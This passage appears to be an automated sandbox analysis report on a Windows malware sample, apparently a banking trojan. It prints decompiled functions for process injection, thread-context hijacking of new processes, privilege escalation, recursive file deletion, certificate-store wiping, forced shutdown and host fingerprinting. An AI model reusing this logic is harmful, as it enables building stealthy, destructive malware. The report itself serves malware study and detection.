        • Instruction ID: 779c559d07f9f014cbf0cbe52ea3665872bdec1b6fcba11b1068caca6213f35d
        • Opcode Fuzzy Hash: c6dd252536e6a693f50f88c2bd1e5f68a5863876f8c0340e1bc9243fbdd20ecf
        • Instruction Fuzzy Hash: 97414C30900119EBCF11AFA5DDC8AEEBB75EF85304F10067AE915B22A1E7355981CB58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E004165E9(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
        				short _v524;
        				struct _WIN32_FIND_DATAW _v1116;
        				intOrPtr _v1120;
        				intOrPtr _v1124;
        				void* _v1128;
        				int _t51;
        				signed int _t60;
        				long _t68;
        				signed char _t71;
        				signed int _t83;
        
        				_v1120 = __edx;
        				_v1124 = __ecx;
        				_t51 = E00416745("*",  &_v524, __ecx);
        				if(_t51 == 0) {
        					L25:
        					return _t51;
        				}
        				_t51 = FindFirstFileW( &_v524,  &_v1116);
        				_v1128 = _t51;
        				if(_t51 != 0xffffffff) {
        					_t71 = _a8;
        					while(1) {
        						_t83 = 0;
        						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
        							break;
        						}
        						if(E0041634A( &(_v1116.cFileName)) != 0) {
        							L23:
        							if(FindNextFileW(_v1128,  &_v1116) != 0) {
        								continue;
        							}
        							break;
        						}
        						_t60 = _v1116.dwFileAttributes & 0x00000010;
        						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
        							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
        								goto L17;
        							} else {
        								goto L10;
        							}
        						} else {
        							L10:
        							if(_a4 <= _t83) {
        								L17:
        								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E00416745( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
        									_t103 = _a24;
        									if(_a24 != 0) {
        										Sleep(_a24);
        									}
        									E004165E9( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
        								}
        								goto L23;
        							}
        							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
        								_t83 = _t83 + 1;
        								if(_t83 < _a4) {
        									continue;
        								}
        								goto L17;
        							}
        							_t68 = _a12(_a16);
        							__eflags = _t68;
        							if(_t68 == 0) {
        								break;
        							}
        							__eflags = _a28;
        							if(_a28 != 0) {
        								Sleep(_a28);
        							}
        							goto L17;
        						}
        					}
        					_t51 = FindClose(_v1128);
        				}
        			}

        APIs
          • Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764
        • FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00416628
        • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041664F
        • PathMatchSpecW.SHLWAPI(?,?), ref: 00416699
        • Sleep.KERNEL32(00000000), ref: 004166C6
        • Sleep.KERNEL32(00000000,?,?), ref: 004166F6
        • FindNextFileW.KERNEL32(?,?), ref: 00416724
        • FindClose.KERNEL32(?), ref: 00416736
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
        • String ID:
        • API String ID: 2348139788-0
        • Opcode ID: a5a14f667d4a8d8709f0b14f28a23be2a29d7af7ee93b5f4c8655a857c0a0d58
        • Instruction ID: 4cd700d4d81ca2384dc3eeb4b078877440d44b63d377371b38171bdb2e31b718
        • Opcode Fuzzy Hash: a5a14f667d4a8d8709f0b14f28a23be2a29d7af7ee93b5f4c8655a857c0a0d58
        • Instruction Fuzzy Hash: 97418D3100430A9BCF21DF14DD48ADF7BA9EF54358F02492AF9A4922A1D339D899CB99
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004127D2(WCHAR* _a4) {
        				void* _v12;
        				intOrPtr _v16;
        				struct _TOKEN_PRIVILEGES _v28;
        				int _t23;
        
        				_t23 = 0;
        				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
        					_v28.PrivilegeCount = 1;
        					_v16 = 2;
        					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
        						_t23 = 1;
        					}
        					CloseHandle(_v12);
        					return _t23;
        				} else {
        					return 0;
        				}
        			}

        APIs
        • GetCurrentThread.KERNEL32 ref: 004127E2
        • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127E9
        • OpenProcessToken.ADVAPI32(000000FF,00000020,00404D8B,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127FB
        • LookupPrivilegeValueW.ADVAPI32(00000000,00404D8B,?), ref: 0041281F
        • AdjustTokenPrivileges.ADVAPI32(00404D8B,00000000,00000001,00000000,00000000,00000000), ref: 00412834
        • GetLastError.KERNEL32 ref: 0041283E
        • CloseHandle.KERNEL32(00404D8B), ref: 0041284D
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
        • String ID:
        • API String ID: 2724707430-0
        • Opcode ID: c84846e603bb78d343a6e205f84c60f6e61a2207154e73c06b821be020bf8fa0
        • Instruction ID: d053ce17fd0c26bb80316417b87ceade86d27a27f07e404bc4057fb44912fd1d
        • Opcode Fuzzy Hash: c84846e603bb78d343a6e205f84c60f6e61a2207154e73c06b821be020bf8fa0
        • Instruction Fuzzy Hash: 2C011271600249BFEB106FA1DE89FEF7B7CEB14745F004165F501E1161E77489958A78
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 81%
        			E0040E9BB(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
        				struct _CONTEXT _v720;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t32;
        				void* _t36;
        				void* _t37;
        				void** _t45;
        				void* _t46;
        				void* _t47;
        				void** _t50;
        				void* _t52;
        				void* _t53;
        				signed int _t55;
        				void* _t65;
        
        				_t47 = __edx;
        				_t45 = _a4;
        				_t32 =  *0x41e5b4(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
        				_a40 = _t32;
        				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E00406B23() != 0 && GetProcessId( *_t45) != 0) {
        					_t36 = E00406946(_t46, _t47, _t35);
        					_a44 = _t36;
        					_t63 = _t36;
        					if(_t36 != 0) {
        						_push(_t52);
        						_t37 = E00406A38(_t46,  *_t45, _t52, _t63, _t36, 0);
        						_t50 = _a8;
        						_t53 = _t37;
        						_a32 = _t53;
        						_t55 = _t53 -  *0x41e5a4 + E00407132;
        						_v720.ContextFlags = 0x10003;
        						if(GetThreadContext( *_t50,  &_v720) == 0) {
        							L12:
        							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
        						} else {
        							_t65 = _v720.Eip -  *0x41e5bc; // 0x77e5ba60
        							if(_t65 != 0) {
        								goto L12;
        							} else {
        								if(( *0x41e590 & 0x00000010) != 0) {
        									_t55 = _t55 ^ _v720.Eax;
        								}
        								_v720.Eax = _t55;
        								_v720.ContextFlags = 0x10002;
        								if(SetThreadContext( *_t50,  &_v720) == 0) {
        									goto L12;
        								}
        							}
        						}
        						CloseHandle(_a44);
        					}
        				}
        				return _a40;
        			}

        APIs
        • NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0040E9E7
          • Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B
        • GetProcessId.KERNEL32(?), ref: 0040EA23
          • Part of subcall function 00406946: CreateMutexW.KERNEL32(0041E5C8,00000001,?,0041E808,74B5F560,?,00000002,?,74B5F560), ref: 00406997
          • Part of subcall function 00406946: GetLastError.KERNEL32 ref: 004069A3
          • Part of subcall function 00406946: CloseHandle.KERNEL32(00000000), ref: 004069B1
        • GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 0040EA75
        • SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 0040EAB5
        • VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 0040EACB
        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040EAD4
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseContextCreateHandleProcessThread$ErrorFreeLastMutexObjectSingleUserVirtualWait
        • String ID:
        • API String ID: 1044471028-0
        • Opcode ID: 2c965bc22dfb692c2b0263780bbae2de36922d61ea5139f9d534e458883e9f08
        • Instruction ID: c4b143df33c8a995bb6f2b32444ab5eb28bfc7e0a318a3a8f88880b89974c935
        • Opcode Fuzzy Hash: 2c965bc22dfb692c2b0263780bbae2de36922d61ea5139f9d534e458883e9f08
        • Instruction Fuzzy Hash: DE312431600219ABDF119FA6CD48BCA7BA9BF08318F058566FD09B62A1D779D860CF58
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CryptAcquireContextW.ADVAPI32(0041678C,00000000,00000000,00000001,F0000040,?,0041678C,?,00000030,?,?,?,00416D0C,00000000), ref: 004123C4
        • CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,00416D0C,00000000), ref: 004123DC
        • CryptHashData.ADVAPI32(?,00000010), ref: 004123F8
        • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00412410
        • CryptDestroyHash.ADVAPI32(?), ref: 00412427
        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00416D0C,00000000), ref: 00412431
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
        • String ID:
        • API String ID: 3186506766-0
        • Opcode ID: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
        • Instruction ID: 41b4f1345105fbec01d42ce5803d4bf471d973bf96d6e1a94b9266b88b5a4f31
        • Opcode Fuzzy Hash: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
        • Instruction Fuzzy Hash: 3111097580024CBFEF129BA5EE88EEE7B7DFB04344F008461F551B1161C7768EA49B28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 46%
        			E004104D7(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
        				char _v5;
        				signed int _v12;
        				char _v20;
        				char _v64;
        				char _v552;
        				char _v556;
        				short _v588;
        				void* __ebx;
        				void* __esi;
        				signed int _t66;
        				signed int _t68;
        				signed int _t69;
        				signed short _t75;
        				signed short _t79;
        				void* _t96;
        				void* _t99;
        				void* _t101;
        				signed short _t103;
        				void* _t104;
        				void* _t105;
        				void* _t106;
        				void* _t107;
        				void* _t108;
        				void* _t109;
        				intOrPtr _t112;
        				void* _t115;
        				signed int _t117;
        				char* _t118;
        				void* _t119;
        
        				_t115 = __edx;
        				_t110 = __ecx;
        				_t117 = _a4;
        				_t120 =  *_t117;
        				_t103 = 1;
        				_v5 = 0;
        				if( *_t117 == 0) {
        					_t101 = E004167A1(_t120);
        					 *_t117 = _t101;
        					if(_t101 == 0) {
        						return 0;
        					}
        					_v5 = 1;
        				}
        				__eflags = _a8 & 0x00000001;
        				if((_a8 & 0x00000001) == 0) {
        					L9:
        					__eflags = _a8 & 0x00000002;
        					if((_a8 & 0x00000002) != 0) {
        						_push( &_v12);
        						_push(0x20000);
        						_push(0x2713);
        						_t109 = 4;
        						_v12 = 0x200099a;
        						_t103 = E004167B5(_t117, _t109);
        					}
        					L11:
        					__eflags = _a8 & 0x00000004;
        					if((_a8 & 0x00000004) == 0) {
        						L16:
        						__eflags = _t103;
        						if(_t103 == 0) {
        							L32:
        							__eflags = _v5 - 1;
        							if(_v5 == 1) {
        								E00411106( *_t117);
        								 *_t117 =  *_t117 & 0x00000000;
        								__eflags =  *_t117;
        							}
        							L34:
        							return _t103;
        						}
        						__eflags = _a8 & 0x00000008;
        						if((_a8 & 0x00000008) == 0) {
        							L20:
        							__eflags = _t103;
        							if(_t103 == 0) {
        								goto L32;
        							}
        							__eflags = _a8 & 0x00000010;
        							if((_a8 & 0x00000010) == 0) {
        								L28:
        								__eflags = _t103;
        								if(_t103 == 0) {
        									goto L32;
        								}
        								__eflags = _a8 & 0x00000020;
        								if((_a8 & 0x00000020) != 0) {
        									E00410423(_t110, _t117, 2);
        									E00410423(_t110, _t117, 0x17);
        									E00416862(E0040689F(), 0x41ea4e, _t115, __eflags, _t117, 0x2724);
        									E0040688B();
        									_t112 =  *0x41e804; // 0x0
        									E004168A0(_t112, _t115, _t117);
        								}
        								goto L34;
        							}
        							_t66 = GetModuleFileNameW(0,  &_v588, 0x103);
        							_a4 = _t66;
        							__eflags = _t66;
        							if(_t66 != 0) {
        								__eflags = 0;
        								 *((short*)(_t119 + _t66 * 2 - 0x248)) = 0;
        								_t110 =  &_v588;
        								_t103 = E00416862(_t66,  &_v588, _t115, 0, _t117, 0x271e);
        							}
        							_a4 = 0x104;
        							__eflags = _t103;
        							if(_t103 == 0) {
        								goto L32;
        							} else {
        								_t68 =  &_v588;
        								__imp__GetUserNameExW(2, _t68,  &_a4);
        								__eflags = _t68;
        								if(_t68 != 0) {
        									_t69 = _a4;
        									__eflags = _t69;
        									if(_t69 != 0) {
        										__eflags = 0;
        										 *((short*)(_t119 + _t69 * 2 - 0x248)) = 0;
        										_t110 =  &_v588;
        										_t103 = E00416862(_t69,  &_v588, _t115, 0, _t117, 0x271f);
        									}
        								}
        								goto L28;
        							}
        						}
        						_t118 =  &_v20;
        						E004079A0(_t118);
        						_push(_t118);
        						_push(0x20000);
        						_push(0x271c);
        						_t104 = 6;
        						_t75 = E004167B5(_a4, _t104);
        						_t103 = _t75;
        						__eflags = _t103;
        						if(_t103 == 0) {
        							_t117 = _a4;
        							goto L32;
        						}
        						__imp__GetUserDefaultUILanguage();
        						_v12 = _t75 & 0x0000ffff;
        						_push( &_v12);
        						_push(0x20000);
        						_push(0x271d);
        						_t105 = 2;
        						_t79 = E004167B5(_a4, _t105);
        						_t117 = _a4;
        						_t103 = _t79;
        						goto L20;
        					}
        					__eflags = _t103;
        					if(_t103 == 0) {
        						goto L32;
        					}
        					_v12 = E00411208();
        					_push( &_v12);
        					_push(0x20000);
        					_push(0x2719);
        					_t106 = 4;
        					_t103 = E004167B5(_t117, _t106);
        					__eflags = _t103;
        					if(_t103 == 0) {
        						goto L32;
        					}
        					_v12 = E00411230();
        					_push( &_v12);
        					_push(0x20000);
        					_push(0x271b);
        					_t107 = 4;
        					_t103 = E004167B5(_t117, _t107);
        					__eflags = _t103;
        					if(_t103 == 0) {
        						goto L32;
        					}
        					_v12 = GetTickCount();
        					_push( &_v12);
        					_push(0x20000);
        					_push(0x271a);
        					_t108 = 4;
        					_t103 = E004167B5(_t117, _t108);
        					goto L16;
        				}
        				_t96 = E00406CC9(_t110,  &_v556);
        				_t110 =  &_v552;
        				_t103 = E00416862(_t96,  &_v552, _t115, __eflags, _t117, 0x2711);
        				__eflags = _t103;
        				if(_t103 == 0) {
        					goto L11;
        				}
        				_t99 = E00406E29( &_v552,  &_v64);
        				__eflags = _v64;
        				if(__eflags != 0) {
        					_t110 =  &_v64;
        					_t103 = E00416862(_t99,  &_v64, _t115, __eflags, _t117, 0x2712);
        				}
        				__eflags = _t103;
        				if(_t103 == 0) {
        					goto L11;
        				}
        				goto L9;
        			}

        APIs
        • GetTickCount.KERNEL32 ref: 004105D6
        • GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 00410629
        • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 0041066F
        • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 004106B5
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: NameUser$CountDefaultFileLanguageModuleTick
        • String ID:
        • API String ID: 2256650695-3916222277
        • Opcode ID: 05f6999ad553beaf7b1e262a131d6b2a800b355242a5c670e568445c75be8dea
        • Instruction ID: b61aef10136e301a3ccd8a727a2c7d6d92bbef2c30c5576b43919b5b61e0c2d7
        • Opcode Fuzzy Hash: 05f6999ad553beaf7b1e262a131d6b2a800b355242a5c670e568445c75be8dea
        • Instruction Fuzzy Hash: 2661E831A412087AE710EF65D849FDE3BA89F01344F04805BBA44AF2D2DBBD99C5CF58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041652E(WCHAR* __ecx, void* __eflags) {
        				struct _WIN32_FIND_DATAW _v596;
        				short _v1116;
        				WCHAR* _t38;
        				void* _t42;
        
        				_t38 = __ecx;
        				if(E00416745("*",  &_v1116, __ecx) == 0) {
        					L9:
        					SetFileAttributesW(_t38, 0x80);
        					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
        				}
        				_t42 = FindFirstFileW( &_v1116,  &_v596);
        				if(_t42 == 0xffffffff) {
        					goto L9;
        				} else {
        					goto L2;
        				}
        				do {
        					L2:
        					if(E0041634A( &(_v596.cFileName)) == 0 && E00416745( &(_v596.cFileName),  &_v1116, _t38) != 0) {
        						_t51 = _v596.dwFileAttributes & 0x00000010;
        						if((_v596.dwFileAttributes & 0x00000010) == 0) {
        							E0041621B( &_v1116);
        						} else {
        							E0041652E( &_v1116, _t51);
        						}
        					}
        				} while (FindNextFileW(_t42,  &_v596) != 0);
        				FindClose(_t42);
        				goto L9;
        			}

        APIs
          • Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764
        • FindFirstFileW.KERNEL32(?,?,?,?,?,750D46D0), ref: 0041655F
        • FindNextFileW.KERNEL32(00000000,?), ref: 004165BA
        • FindClose.KERNEL32(00000000), ref: 004165C5
        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,750D46D0), ref: 004165D1
        • RemoveDirectoryW.KERNEL32(?), ref: 004165D8
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
        • String ID:
        • API String ID: 765042924-0
        • Opcode ID: ccc2a7266b76de1c5751291083e188c13617f37091ac9507e112196c445a5527
        • Instruction ID: cfe1ffdb500f770d72ea71eb28d4fd10aa372431ac9313a26f07defe6ab8ac44
        • Opcode Fuzzy Hash: ccc2a7266b76de1c5751291083e188c13617f37091ac9507e112196c445a5527
        • Instruction Fuzzy Hash: E811E731004204ABC720FBA4ED4DAEF77ED9F85315F01452FFDA5D2194EB38D989865A
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CertOpenSystemStoreW.CRYPT32(00000000,004030F4), ref: 0040D4FF
        • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0040D518
        • CertDeleteCertificateFromStore.CRYPT32(00000000), ref: 0040D523
        • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040D52B
        • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D537
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
        • String ID:
        • API String ID: 1842529175-0
        • Opcode ID: a25e74c9813670f02db07325cdd3a6cc288abaa77481d8e78ff5ecb15df9f522
        • Instruction ID: 09c422542fca68a072a4d760d7fd531b1772b0f8b0e95c547efa7b48167a79df
        • Opcode Fuzzy Hash: a25e74c9813670f02db07325cdd3a6cc288abaa77481d8e78ff5ecb15df9f522
        • Instruction Fuzzy Hash: F8F0A73168111176C22117755D19BB7775CDB56B55F040033FE84F36A0CE3489498569
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E0040D61F(void* __ebx, void* __ecx) {
        				signed int _v124;
        				signed char _t12;
        				unsigned int _t15;
        
        				_t12 =  *0x41eb54; // 0x0
        				if((_t12 & 0x00000010) == 0) {
        					__eflags = _t12 & 0x00000008;
        					if(__eflags != 0) {
        						E0040570F(__ebx, __ecx, __eflags);
        						_t12 =  *0x41eb54; // 0x0
        					}
        					__eflags = _t12 & 0x00000003;
        					if((_t12 & 0x00000003) == 0) {
        						__eflags = _t12 & 0x00000004;
        						if((_t12 & 0x00000004) != 0) {
        							goto L8;
        						}
        						goto L9;
        					} else {
        						E004127D2(L"SeShutdownPrivilege");
        						_t15 =  *0x41eb54; // 0x0
        						__eflags = 0;
        						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t15 >> 0x00000001 & 0x00000001, 0x80000000);
        						return 0;
        					}
        				} else {
        					_t12 = E00404A11( &_v124);
        					if(_t12 != 0) {
        						_v124 = _v124 | 0x00000020;
        						 *0x41e590 =  *0x41e590 | 0x00000010;
        						E00404A69( &_v124);
        						L8:
        						return ExitWindowsEx(0x14, 0x80000000);
        					}
        					L9:
        					return _t12;
        				}
        			}

        APIs
        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040D684
          • Part of subcall function 00404A11: CreateMutexW.KERNEL32(0041E5C8,00000000,0041E408,?,?,0040F221,?,?,?,918317B5,00000002), ref: 00404A37
        • ExitWindowsEx.USER32(00000014,80000000), ref: 0040D697
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CreateExitInitiateMutexShutdownSystemWindows
        • String ID: $SeShutdownPrivilege
        • API String ID: 3829579691-2253681161
        • Opcode ID: d0e43b2ddbe7824f0c01ffb3f9e3529350da4123628ccddef23853ea0f46019e
        • Instruction ID: e6c83c3d2ef5464a633aef088971f93e9ab5a69278f3858186ead65f4fc95cc3
        • Opcode Fuzzy Hash: d0e43b2ddbe7824f0c01ffb3f9e3529350da4123628ccddef23853ea0f46019e
        • Instruction Fuzzy Hash: B4F0F97560430859EE10A7F55D46BEA3B6C9B40308F10083AEE82F32E2C67DA4459A2D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00415819(void* __eax, void* _a4) {
        				char _v5;
        				signed int _v12;
        				signed int _v16;
        				intOrPtr _v20;
        				long _v24;
        				void* _t37;
        				void* _t42;
        				intOrPtr* _t43;
        				int _t44;
        				long _t46;
        				void* _t47;
        				SIZE_T* _t48;
        				signed int _t50;
        				void* _t52;
        				void* _t54;
        				void* _t55;
        				void* _t60;
        				intOrPtr _t61;
        				intOrPtr _t62;
        				unsigned int _t64;
        
        				_t55 = __eax;
        				_t1 = _t55 + 0x3c; // 0xd8
        				_t60 =  *_t1 + __eax;
        				_t46 =  *(_t60 + 0x50);
        				_v24 = _t46;
        				_v5 = 0;
        				if(IsBadReadPtr(__eax, _t46) == 0) {
        					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
        					_v12 = _t37;
        					__eflags = _t37;
        					if(__eflags == 0) {
        						L17:
        						return _v12;
        					}
        					_t47 = E00411159(__eflags, _t55, _t46);
        					_t48 = 0;
        					__eflags = _t47;
        					if(_t47 == 0) {
        						L16:
        						VirtualFreeEx(_a4, _v12, 0, 0x8000);
        						_t32 =  &_v12;
        						 *_t32 = _v12 & 0x00000000;
        						__eflags =  *_t32;
        						goto L17;
        					}
        					__eflags =  *(_t60 + 0xa4);
        					if( *(_t60 + 0xa4) <= 0) {
        						L15:
        						E00411106(_t47);
        						__eflags = _v5;
        						if(_v5 != 0) {
        							goto L17;
        						}
        						goto L16;
        					}
        					_t42 =  *(_t60 + 0xa0);
        					__eflags = _t42;
        					if(_t42 <= 0) {
        						goto L15;
        					}
        					_t61 =  *((intOrPtr*)(_t60 + 0x34));
        					_t54 = _v12 - _t61;
        					_v20 = _t55 - _t61;
        					_t43 = _t42 + _t47;
        					while(1) {
        						__eflags =  *_t43 - _t48;
        						if( *_t43 == _t48) {
        							break;
        						}
        						_t62 =  *((intOrPtr*)(_t43 + 4));
        						__eflags = _t62 - 8;
        						if(_t62 < 8) {
        							L12:
        							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
        							_t48 = 0;
        							__eflags = 0;
        							continue;
        						}
        						_t64 = _t62 + 0xfffffff8 >> 1;
        						__eflags = _t64;
        						_v16 = _t48;
        						if(_t64 == 0) {
        							goto L12;
        						} else {
        							goto L9;
        						}
        						do {
        							L9:
        							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
        							__eflags = _t50;
        							if(_t50 != 0) {
        								_t52 = (_t50 & 0x00000fff) +  *_t43;
        								_t19 = _t52 + _t47;
        								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
        								__eflags =  *_t19;
        							}
        							_v16 = _v16 + 1;
        							__eflags = _v16 - _t64;
        						} while (_v16 < _t64);
        						goto L12;
        					}
        					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
        					__eflags = _t44;
        					_t28 =  &_v5;
        					 *_t28 = _t44 != 0;
        					__eflags =  *_t28;
        					goto L15;
        				}
        				return 0;
        			}

        APIs
        • IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 00415835
        • VirtualAllocEx.KERNEL32(74B5F560,00000000,?,00003000,00000040,?,74B5F560,00000000), ref: 00415853
        • WriteProcessMemory.KERNEL32(74B5F560,74B5F560,00000000,00400000,00000000,00400000,?,?,74B5F560,00000000), ref: 004158E5
        • VirtualFreeEx.KERNEL32(74B5F560,74B5F560,00000000,00008000,00400000,?,?,74B5F560,00000000), ref: 0041590A
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Virtual$AllocFreeMemoryProcessReadWrite
        • String ID:
        • API String ID: 1273498236-0
        • Opcode ID: a7b6dd3d706f2f9495a4aaecab9c1e719e5aa556d899e9e93c5534505d3d2f33
        • Instruction ID: ee52e8a917456dac8c0b12ff69a5ae926dcc1775b6dada67237ccc16f024d014
        • Opcode Fuzzy Hash: a7b6dd3d706f2f9495a4aaecab9c1e719e5aa556d899e9e93c5534505d3d2f33
        • Instruction Fuzzy Hash: 7D31CE71E00618EFCF10ABA4CC84BEEBBB4BF85715F1440AAE505B62A0D3749D90CB58
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • socket.WS2_32(00000000,00000001,00000006), ref: 0041416D
        • bind.WS2_32(00000000,?,-0000001D), ref: 0041418D
        • listen.WS2_32(00000000,?), ref: 0041419C
        • closesocket.WS2_32(00000000), ref: 004141A7
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: bindclosesocketlistensocket
        • String ID:
        • API String ID: 952684215-0
        • Opcode ID: 94d28268ac41eba900371f48eb6f6e3354ad8adca4119d380cebbd32af3b6e1d
        • Instruction ID: ccee8f17ebe4a93b630d5f0d370988e1e5d071bfb8ded29b2d4f92ce7412beff
        • Opcode Fuzzy Hash: 94d28268ac41eba900371f48eb6f6e3354ad8adca4119d380cebbd32af3b6e1d
        • Instruction Fuzzy Hash: EBF030722001017AE6201F39DD4DBBF3ABA9BD1771B18472AF965D21F1E73884C1D628
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E0040E904(void* __ecx, void* __edx, void* __esi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
        				void _v28;
        				long _v32;
        				intOrPtr _v40;
        				void* __ebx;
        				void* __edi;
        				void* _t21;
        				void* _t27;
        				signed int _t30;
        				void* _t32;
        				void* _t34;
        				void* _t35;
        				void* _t38;
        				void* _t40;
        				void* _t42;
        
        				_t42 = __esi;
        				_t38 = __edx;
        				_t35 = __ecx;
        				_push(_t32);
        				_t21 = E00406B23();
